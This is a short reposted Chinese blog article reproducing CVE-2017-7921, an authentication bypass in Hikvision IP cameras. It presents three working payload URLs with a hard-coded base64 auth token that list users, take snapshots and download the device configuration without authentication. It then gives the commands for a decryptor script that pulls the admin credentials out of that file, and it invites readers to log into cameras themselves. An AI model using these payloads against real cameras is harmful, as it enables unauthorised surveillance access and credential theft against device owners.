CVE-2017-7921复现(解密文件)
生活随笔
收集整理的這篇文章主要介紹了
CVE-2017-7921复现(解密文件)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
前言:CSDN管理博客內容較嚴格,有些內容會涉嫌違法違規,以往發布的被打回,這篇文章是經修改后的,故下面有些內容我會粗略寫到,大家主要看payload即可
漏洞描述
該公司多款產品中存在身份驗證漏洞。攻擊者可利用該漏洞提升權限,獲取敏感信息的訪問權限。
通過構造url進行檢索所有用戶、屏幕截圖、配置文件下載,得到二進制配置文件:configurationFile,并且可以提取登錄的賬號密碼。
Payload
IP/Security/users?auth=YWRtaW46MTEK 檢索所有用戶 IP/onvif-http/snapshot?auth=YWRtaW46MTEK 獲取鏡頭快照而不進行身份驗證 IP/System/configurationFile?auth=YWRtaW46MTEK 下載攝像頭二進制配置文件影響版本
因涉嫌違法,經修改暫略
解密二進制文件(configurationFile)
1、腳本下載:
- 百度網盤鏈接:https://pan.baidu.com/s/1sMV0kCeqv7mHD0BHB3qEDw
提取碼:peak - 腳本原鏈接:https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor
2、腳本使用方法:
- 依賴庫:pycryptodome
依賴庫安裝:py -3 -m pip install pycryptodome
因為我的電腦安裝了兩個版本的python,所以使用py -3 - 解密命令:
py -3 decrypt_configurationFile.py configurationFile
紅框中的就是后臺登陸的賬號密碼
由于特殊原因,就寫到這里,不進行攝像頭的登錄了,方法交給你們了,有興趣的自己去驗證吧
總結
以上是生活随笔為你收集整理的CVE-2017-7921复现(解密文件)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 英雄联盟手游app怎么查别人战绩
- 下一篇: cf角色通用化是什么意思 为什么还有人玩